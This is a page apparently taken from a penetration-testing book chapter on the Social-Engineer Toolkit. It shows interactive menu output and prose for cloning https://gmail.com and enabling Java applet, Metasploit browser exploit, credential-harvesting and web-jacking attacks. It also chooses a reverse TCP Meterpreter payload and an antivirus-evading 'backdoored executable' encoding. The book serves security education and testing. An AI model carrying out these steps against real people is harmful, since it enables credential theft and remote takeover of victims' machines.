background image

154

Chapter 10

Turning the Java Applet Attack Vector to ON

Select which attacks you want to use:

Enter your choice one at a time (hit 8 or enter to launch): 

2

Turning the Metasploit Client Side Attack Vector to ON

Option added. Press {return} to add or prepare your next attack.

Select which attacks you want to use:

Enter your choice one at a time (hit 8 or enter to launch): 

6

Turning the Web Jacking Attack Vector to ON

Select which attacks you want to use:

. . . SNIP . . .

Enter your choice one at a time (hit 8 or enter to launch):

Begin configuring the attack by selecting 

Multi-Attack Web Method

   

from the main menu, and then choose 

Site Cloner

   and enter the URL to 

clone, 

https://gmail.com

  . Next, SET presents a menu of different attacks. 

Select 

The Java Applet Attack Method

  , then 

The Metasploit Browser Exploit 

Method

  , and finally, select 

Web Jacking Attack Method

  . You could also select 

option 7,

 Use them all - A.K.A. 'Tactical Nuke'

 to enable all the attack vectors 

automatically.

In the preceding example, notice that the flags have changed and that 

the Java applet, Metasploit browser exploit, credential harvester, and web 
jacking attack methods have all been enabled. To proceed, press 

ENTER

 or 

choose option 8 (

I'm finished...

).

Enter your choice one at a time (hit 8 or enter to launch):
What payload do you want to generate:

Name:                                      Description:

 2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send 

back to attacker.

Enter choice (hit enter for default):

 

Below is a list of encodings to try and bypass AV.

Select one of the below, 'backdoored executable' is typically the best.

 16. Backdoored Executable (BEST)